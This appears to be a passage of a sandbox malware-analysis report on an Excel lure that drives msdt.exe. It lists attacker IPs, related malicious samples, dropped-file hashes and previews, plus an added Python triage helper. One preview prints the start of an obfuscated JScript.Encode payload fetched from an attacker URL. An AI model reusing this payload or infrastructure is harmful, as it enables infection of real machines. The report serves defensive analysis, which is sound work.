| | Alfa Laval Aalborg AS Overdue Invoice .xlsx | malicious | 192.227.168.194 |
| | FAX From +271120073893.xlsx | malicious | 192.227.168.194 |
| | RFQ 1000712834.xlsx | malicious | 192.227.168.194 |
| | cYqx6CLuq4.exe | malicious | 192.227.225.175 |
| | Delivery Refrence .xlsx | malicious | 23.95.34.14 |
| | New Order No 75674834700.xlsx | malicious | 104.168.33.66 |
| | Offer basis in USDkg - PRE TREATMENT PACKAGE.xlsx | malicious | 104.168.32.43 |
                                                                                                                                                          No context
| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dll | WF0SlQWKr1.docx | malicious | |
| | V3g2Pfu707.docx | malicious | |
| | 5YMh6S8QVr.docx | malicious | |
| | ZDhoKQk8G6.docx | malicious | |
| | TranQuangDai.docx | malicious | |
| | doc782.docx | malicious | |
| | 68101181_048154.img | malicious | |
| | doc782.docx | malicious | |
| | doc1712.docx | malicious | |
| | R346ltaP9w.rtf | malicious | |
| | VIP Invitation to Doha Expo 2023.docx | malicious | |
| | WykHEO9BQN.rtf | malicious | |
| | lol666 (2).bat | malicious | |
| | EISPv0c56U.doc | malicious | |
| | mjpoc_slide.doc | malicious | |
| | mjpoc_slide.doc | malicious | |
| | 05-2022-0438.doc | malicious | |
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 149126
Entropy (8bit): 5.356744655596469
Encrypted: false
SSDEEP: 1536:6cQW/gxgB5BQguw5/Q9DQC+zQWk4F77nXmvidkXx5ETLKz6e:FJQ9DQC+zcXwI
MD5: 6FF92A7CC58B007B5CF50798752F5FF6
SHA1: B1500193F727C0943683A97216E28A9CEB39E45F
SHA-256: 3BA0725357DE15FE94FA3B623E1C08191CEFF322EB8EC431404F306F15D8B7F4
SHA-512: 0E67CE141AD773AB8C7D15AED840FE3DEB50D67DAF2AEE2B372CF46D309CB7BC3686076B8B167C0BB10DC569B58893F556F169430EA2A2C8F403596912415911
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-28T08:44:30">.. Build: 16.0.15420.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 130 x 187, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 16424
Entropy (8bit): 7.9810223666914055
Encrypted: false
SSDEEP: 384:rGO9ao+FvCVT/82OoZJh+5thcR6zPOkCpVP9o+axwZFl+v:6Olyc8cNpVlKoW
MD5: 86212DE909C5057FF80D28C6BCDA1B97
SHA1: 7B4846994D2A926D32AE44464802C8862D0D89AD
SHA-256: B796FFD015039600D93F191B42361B22A940F84BAADA5E4E7A9BD62829458BD0
SHA-512: DE7F37E3BF5A8E07BB5E323EA9A767CEE3856925DA332A4858C5D44A1B9635D9660BFE809BE6F6A8CCCB4EA3CD578CBE395A7B25AC30A89476353B898A585F4B
Malicious: false
Reputation: moderate, very likely benign file
                                                                                                                                                                                            Preview:.PNG........IHDR.............&......[iCCPICC Profile..x..Xy8U]._.....LNfB.."2.C..q...q...R...TR.SH"c2.HH.YI.I.....z.o.....[.u.......}.{....>|pp....H .-...v..X.1......&.{h.....,....0.([...[o.'_l#K..\..L.;...P.C3.a..@R0.....(.m.[Sp.)....P.......0."Z[j....{......K..w....@.J..%.@=.cu..Pwx....#.=... ....`..0/..L.u.Wa,L9.x.G@#.*p....s.Z.*.....oN....D..p..,w.........5......nggI..-...........\..o.h.p.#....7.u..........N.%...2....H.d?..:.*..D.O.G.N.........Ff..h.r.......{QPZ.[.R.K\W...~.(..C.8..r%..g...h......##..j.G..K4...j.....sO..^.~.....F..=&C..f3....4V.."6.m.NX.9..8.:F;.;'.Lu..z...v...Y.U...3......x.`.D.N..G|..O...9|!b)r-.:M...#.{...Y...s...P._w..R._..M..I...//.......22.<.:..=K.:........^..zW*G?.-/.^V~.......B."....%..>ea......*..7V5T..T.>....$.!..3.F.&./._5?|q..U...m.eI..+.W..........G.=4=U.n}L}......O.....Z.CG.G.G.^[.a~.7...|.a.........]?.}h.:5........O..&f.?.}Q...../_......._...k...U-...........9......_..A.P).(b.y....F.R....yK;G..........v........g...

Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 344
Entropy (8bit): 2.446884075910387
Encrypted: false
SSDEEP: 6:YDRX/5OQHzqEkNslqg6lnW6kK0XgtjuYVz2tYVzfvt8J:Y1ROo6ClqgOnVp0NYVxVjw
MD5: 00022229E61960C6F67FEA5ABD7CC7BF
SHA1: 95550373818BBB679D2388324C94A949CFFF90D5
SHA-256: CA521CE8E4A2C824905F74E45089E94D008E3E346439ECB9146AAD551C609A0F
SHA-512: CE17174A7CD5F6063151FF025F50C2DB959421A529B45358750C6722E10FBD1E073970AD1809D03E86BF58AA9752EEA286907EF53630321D50146EA6FEBDF8F4
Malicious: false
                                                                                                                                                                                            Preview:....l................................... EMF....X...........................8...X....................?......F...X...L...GDIC..........#s....4...............................................................................8...............8...................................%...........%...........0...........K...................................

Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 498420
Entropy (8bit): 0.641121533751757
Encrypted: false
SSDEEP: 384:jXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:DXwBkNWZ3cjvmWa+VDO
MD5: B6B2AE798B3758B49D802640BD39AF32
SHA1: 656AC44B76A94412C192609FBE730B73B238C3A9
SHA-256: 6E281E82686640834CECC8BAECB83C1AEB68114A45299115D5B590E7C51E9332
SHA-512: 375A29D725F6FD007BEE3C126165635DC89D16CAAB1FB0D5AD5AA87A1332E51EB55153D6216A954EA77E3B2DA11C35DAB2D428AAB7014B9813035964090F7DE8
Malicious: false
                                                                                                                                                                                            Preview:....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................[$...(....f.[.@..%.......H...........,...RQ(]....................$Q(]........ ...Id.[........ ............d.[............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...........8...X............8.[........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....

Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: data
Category: downloaded
Size (bytes): 21741
Entropy (8bit): 6.426960150522073
Encrypted: false
SSDEEP: 384:+z357eNbjcN0gKdG9iSrvx/oBqEq7LFGgsdHmYGvx:+pedjcP915/8nq7LFGndHOx
MD5: CDF5BDD4111E8CD5F0349DAFA4FD69D6
SHA1: 93FBE5D73A10E5C80593BB765203B05642C38574
SHA-256: 59AA679DE09E68BC33D33371FEEF67837410E0056C10A9D66D87F01F667DD006
SHA-512: 7400E6CA2B650D0451EE923E2C0F036DEA165EE008BF1E50FECDD282794CF0F31975D4ED854E0440F314318C0E5AF99D0E5E048BBA636E3062D691B0101DB299
Malicious: false
IE Cache URL: http://172.245.119.48/shipping_invc/document.html
                                                                                                                                                                                            Preview:<!DOCTyPE hTML>....<hTmL>....<bODy>....<scRipT .TyPE="Text/jsCRipt.Encode">....//**sTArT encode**....#@~^S1QAAA==@#@&@#@&^W1lYbW. tM+WP{PE\kOHr~P3PJU9P)rP,_~J&r9J~P3~J,J~Q,Jw^.9k)Mg6rP~3Pr/K&mr~P3PEPrPQ~rO/0rJ,P_,EKJ,P3PEPE~3PEs}.J,PQ~rZ2E~,_~J,E,_~rzhbDrP,QPrb\J,PQ~rPJ,QPr-Jr~QPrqD{.2E~,_~J~.WS?nWKJP~Q,J.s&J.'E,P3PJ[b&PJ,_~J,J~Q,Jq:mSmEx14\+DtKNxZGUD+EP,QPr6O\rPPQ~r+UEr~,_~rPrP_,J&P{~J~P3PE.Kh/.oWMsk^E~P3Pr+EP~Q,JxJ,~_,J*zD^`E~3PEqAav^c&2o`B]?HdKA: KA6O .1ZK[q.oTEQ,Z_lMTX%Q,;C)DYX%3BiPw%R!n:?OI&UT`,U5kY2sR1617+]KYBQ,;tlMD*R_$1u)IY*R_vs]6tA)/A.ckY]rgo`vQ]mul"D2cQEj8I\1Z8Am0,%}j1P(;FM(f9G}?zO83wY\?)x8pg3[Z1{9wNC(G!oe."3J."X12iTSqFs(.xsmsIo}sV;joI9:TcT9FD38MX9(($\^U5W(xjzKAF-Pb*383SkJZ~9mMoHjy.!&fZLpyt4m^1s[;*.(hVN4 "sF.8h9.B/C.to^&"4NVV%(V.c[!jX8k~B(x]5N_qoj.x\IV,f4s6-eqIj(T}a4M`Gj.l!`C]X(3D(PZX"N_928smo^3k/^&"zm.X.qVw!"XXqlq*TqA.fJAVE9oAZmk~.e:1w}X^oJilt8.`Lq^spebqoJiltP.jP`MoN}UAY1XzOjVs"m8IG^.jG&/Io.LK.#.xH"M1&8hX\e."i4Z}28VjW\/SkCC"T1fG7S.2&tkWz1Gj;H:2XJNpcd"o2HZO+e:tE\(4V(rSkBMj6NN
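A triage helper added here as an illustration; it is not part of the Joe Sandbox report or its tooling. It recomputes the per-file fields each record above carries (the four digests and the 8-bit Shannon entropy) and adds two content checks taken from this report: the MZ header that the csc.exe output starts with, and the `#@~^` marker plus the `Text/jsCRipt.Encode` type attribute that open the downloaded document.html. The inputs are constructed, the `is_pe` and `jscript_encode` flags are this example's own heuristics, and `matches_report` is a convenience for checking a file on disk against the listed hashes.

```python
"""Added triage helper (not from the Joe Sandbox report or its tooling).

Recomputes the report-style fields for a blob (MD5/SHA1/SHA-256/SHA-512 and
8-bit Shannon entropy) and adds two content flags drawn from this report:
an MZ header and the JScript.Encode start marker seen in document.html.
"""
import hashlib
import math
import re
from collections import Counter

# Marker the Microsoft Script Encoder emits at the start of an encoded block;
# the document.html preview shows it right after the script type attribute.
JSCRIPT_ENCODE_START = b"#@~^"

# The sample mixes case in the attribute (TyPE="Text/jsCRipt.Encode"), so the
# match is case-insensitive and tolerant of whitespace and quoting.
_JSE_TYPE_RE = re.compile(rb'type\s*=\s*["\']?text/jscript\.encode', re.IGNORECASE)


def entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte, 0.0 .. 8.0, the sandbox's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def hashes(data: bytes) -> dict:
    """Digests in the same upper-case hex form the report prints."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def triage(data: bytes) -> dict:
    """Report-style record plus the two content flags (heuristics of this example)."""
    rec = {"Size (bytes)": len(data), "Entropy (8bit)": entropy_8bit(data)}
    rec.update(hashes(data))
    rec["is_pe"] = data[:2] == b"MZ"
    rec["jscript_encode"] = (
        JSCRIPT_ENCODE_START in data or _JSE_TYPE_RE.search(data) is not None
    )
    return rec


def matches_report(data: bytes, expected: dict) -> bool:
    """True if every hash/size field given in `expected` matches the data."""
    rec = triage(data)
    return all(str(rec.get(k)).upper() == str(v).upper() for k, v in expected.items())


# Constructed inputs (not the actual dropped files): a mimic of the encoded
# HTML's opening bytes and a bare PE-looking stub.
SAMPLE_HTML = (b'<!DOCTyPE hTML><hTmL><bODy><scRipT TyPE="Text/jsCRipt.Encode">'
               b'#@~^S1QAAA==@#@&...</scRipT></bODy></hTmL>')
SAMPLE_PE_STUB = b"MZ" + b"\x00" * 62 + b"PE\x00\x00"

if __name__ == "__main__":
    for name, blob in (("document.html mimic", SAMPLE_HTML), ("pe stub", SAMPLE_PE_STUB)):
        print(name, triage(blob))
```

To check a file pulled from the sandbox against a record above, read it as bytes and call `matches_report(data, {"MD5": "...", "Size (bytes)": ...})` with the values from that record; a mismatch on size alone usually means the artifact was truncated or re-encoded on the way out.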

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 3584
Entropy (8bit): 3.09405754705922
Encrypted: false
SSDEEP: 24:etGSBm9pz1qlkCe745Q7GslPorPjvX5ekjV4gztkZfPy6Iv+SnOBWI+ycuZhNSGX:6Upqb927GslPIDRjyJP0Ok1ul7a3Xq
MD5: 9AECF9FCAD18AD5C87157D7A648B6BD4
SHA1: C30F06A3A49A0F52ECC64FF544159AB46E09B084
SHA-256: 884C79B3C442E367C47C28CE379460E8EC0849D4C4D6381657794F40B2A7CB67
SHA-512: CE0425D8EC6E3104A8E02DDD1A40D8B22F27CF600BF2D730AA29C904C6C619B2667784ECD66FFB8B9FC717C19293AC0D4877D3D0B0AFAC15A772E7C7A5683E74
Malicious: false
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type: MSVC .res
Category: dropped
Size (bytes): 652
Entropy (8bit): 3.11907740507641
Encrypted: false
SSDEEP: 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grykGak7YnqqlXPN5Dlq5J:+RI+ycuZhNSGakSlXPNnqX
MD5: 85E307F916985ED8227C37FD6EAAD243
SHA1: 72F137CA124C6E97E4546458E2F076B75A2927DE
SHA-256: 23C6B12E792794E645586D3E40359BDE672C6618968B96A525030C4D3F36F414
SHA-512: 1C1D539D6631373D01238A80142B253EAEA39740955EE8E8B452645D69BFCA25D99CBEC10BE44D0A2DC4BFD52EFE5A972CEEA467CC385C0929410CB46D5CC307
Malicious: false
                                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.f.y.o.f.3.j.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.f.y.o.f.3.j.w...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type: Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
Category: dropped
Size (bytes): 1364
Entropy (8bit): 4.1027541743460825
Encrypted: false
SSDEEP: 24:H4C9A++fCXXOODfHNhKYDfII+ycuZhNSGakSlXPNnq9Wd:ixCXXO07K2g1ul7a3Xq9m
MD5: 8FEBD54D47AB795291C00E5A653BE4F6
SHA1: F1223492FCCFFDF42690645083E72AEE47618D18
SHA-256: 0B69D1611DEA610CBDE2B25572D75CC2749E05EB36ECAD7E5D33A3BB5772896A
SHA-512: 9B634837EA9FD829CFE4BEE2EDE06C706E85787058241CDCA11BF66DC4D6BAE10CCD96CD5591EB165D590A7E1A0C3A32E0A97A92D4522C0FD677C609317BD986
Malicious: false
                                                                                                                                                                                            Preview:L.....b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP.....................^."|7.n..C..........4.......C:\Users\user\AppData\Local\Temp\RES13B6.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.f.y.o.f.3.j.w...d.l.l.....(.....L.e.g.a.l.C.o.p.

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type: Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
Category: dropped
Size (bytes): 1364
Entropy (8bit): 4.114314965892433
Encrypted: false
SSDEEP: 24:H6gC9AWZfEGTFw0DfHWFhKYDfII+ycuZhNnakSJPNnq9Wd:fWBZTFwy2zK2g1ulna3rq9m
MD5: 8F7E3DC0BAFE313F5CD4C9AF8D658E10
SHA1: 4B3A6AEE81EE79CED7D9B6A13A52407D67AC4C9D
SHA-256: 4F3476B8E205E0B0908EBD5F50CBFA9776823AECC322FBE2F33366252BCC429A
SHA-512: CD52EAB587B8F33B85E5458CE4DD1FA8455F43C1DE14E6C896161D095551FDB74C313BDE226E35D5ACCDE2AC8132B62214DFCFA16F0650D10BBB8311F341BE89
Malicious: false

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.095959176124916
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grykaak7YnqqNrPN5Dlq5J:+RI+ycuZhNnakSJPNnqX
MD5:E4A1CF9558A786A84B1619C8E5EDAD75
SHA1:D45ABADD224059F87E1FDF4E2EE2CF16A9DDAA1D
SHA-256:EFDC4288424F961795D5E2C02F93CDD08C0581BA9F6F5A82474732471A4FA216
SHA-512:624668625F58B06B84E82B984E34059F14F6EE4C25AFBCB192A2DFC2338285C79B5872B4F8167695C2659D52E2031342BEC78C8F449C6F58FA3CA176021DFF47
Malicious:false

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):5120
Entropy (8bit):3.7814229864516253
Encrypted:false
SSDEEP:48:63oPhmKraYZkH8KTibUyXkwjj0JOC+CFSlwY9c1ulna3rq:1DaAkHHo5k8hCuZlK
MD5:CA38C4E07EE62DF319C8D61BFDB96BCA
SHA1:8840EFA9C96F5793650FDB7EB7396A4910082235
SHA-256:B557E8D652DBB7E83CBE18AF2557802FCD2B435EE30CD052E60D44C77844074E
SHA-512:C8162752A07C0970A9247F389BF5774ED1EFDB73F6319DFED55AAD190E2F6C33E6FB9D487EB9AA616A9C1E5BE1F5D7199A1339A2E9D0483F047DE40860B700B5
Malicious:false

Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:CDFV2 Encrypted
Category:dropped
Size (bytes):72696
Entropy (8bit):7.868306503118196
Encrypted:false
SSDEEP:1536:eZfD+2fBiNR+vgt1ru46raHpu8KBZo5ujmBonFLT1J:eZyVhTWupIrocjmBoFz
MD5:A8930C1FCD80E9965AE26446AFB717F6
SHA1:0CBF04BF7FC8522AB983F0246357FA70A85EE56B
SHA-256:C02FF7B4D28A259D37A659A6951DBA4EE574562EF5FC3B3A0135640C0370DEE2
SHA-512:EAD35C97BFCCB344ED5837E82E1F648E518C52A1C6C67BD6511E018B4DC2D1364AE1F6B7DDAD69F02E58AA417402327AC3E36F175220C2C6F72FC01D4758B77F
Malicious:false

Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false

Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):165
Entropy (8bit):1.6081032063576088
Encrypted:false
SSDEEP:3:RFXI6dtt:RJ1
MD5:7AB76C81182111AC93ACF915CA8331D5
SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
Malicious:true
Preview:.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Process:C:\Windows\SysWOW64\msdt.exe
File Type:HTML document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):24702
Entropy (8bit):4.37978533849437
Encrypted:false
SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
MD5:191959B4C3F91BE170B30BF5D1BC2965
SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
Malicious:false
Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..

Process:C:\Windows\SysWOW64\msdt.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):66560
Entropy (8bit):6.926109943059805
Encrypted:false
SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
MD5:6E492FFAD7267DC380363269072DC63F
SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                            • Filename: WF0SlQWKr1.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: V3g2Pfu707.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: 5YMh6S8QVr.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: ZDhoKQk8G6.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: TranQuangDai.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: doc782.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: 68101181_048154.img, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: doc782.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: doc1712.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: R346ltaP9w.rtf, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: VIP Invitation to Doha Expo 2023.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: WykHEO9BQN.rtf, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: lol666 (2).bat, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: EISPv0c56U.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: mjpoc_slide.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: mjpoc_slide.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: 05-2022-0438.doc, Detection: malicious, Browse
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):50242
                                                                                                                                                                                            Entropy (8bit):4.932919499511673
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                                            MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                                            SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                                            SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                                            SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):16946
